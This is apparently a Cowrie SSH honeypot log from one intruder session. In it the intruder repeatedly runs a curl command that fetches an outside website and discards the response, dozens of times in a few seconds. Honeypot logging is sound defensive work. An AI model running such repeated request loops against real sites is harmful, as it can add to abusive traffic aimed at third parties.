{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.841537Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.879553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.880589Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.917380Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.918387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.957741Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.958603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:17.996546Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:17.997411Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.038823Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.039742Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.084342Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.085267Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.132425Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.133342Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.170868Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.172066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.213794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.214781Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.251301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.252151Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.289650Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.290872Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.329772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.330698Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.367899Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.369101Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.405635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.407046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.444723Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.445643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.484010Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.484889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.531706Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.532860Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.569881Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.570778Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.607140Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.608027Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.644545Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.645399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.682997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.683828Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.722080Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.722936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.765034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.765874Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.803603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.804453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.842266Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.843152Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.880376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.881256Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.928449Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.929329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:18.965761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:18.966645Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.003820Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.004739Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.041456Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.042529Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.079903Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.081026Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.117836Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.118731Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.155554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.156495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.193648Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.194817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.231313Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.232198Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.271148Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.272312Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.321104Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.321913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.358468Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.359408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.396227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.397084Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.434891Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.435806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.472578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.473638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.512206Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.513098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.549915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.550983Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.589429Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.590276Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.628713Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.629552Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.668227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.669070Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.716246Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.717081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.756407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.757392Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.809389Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.810264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.850080Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.850960Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.887491Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.888607Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.926992Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.927830Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:19.964566Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:19.965473Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.005519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.006993Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.044245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.045263Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.085460Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.086378Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.133453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.134753Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.173191Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.174046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.213337Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.214230Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.253917Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.254771Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.292129Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.292999Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.330102Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.330981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.367635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.368510Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.406731Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:20.407666Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:20.444348Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
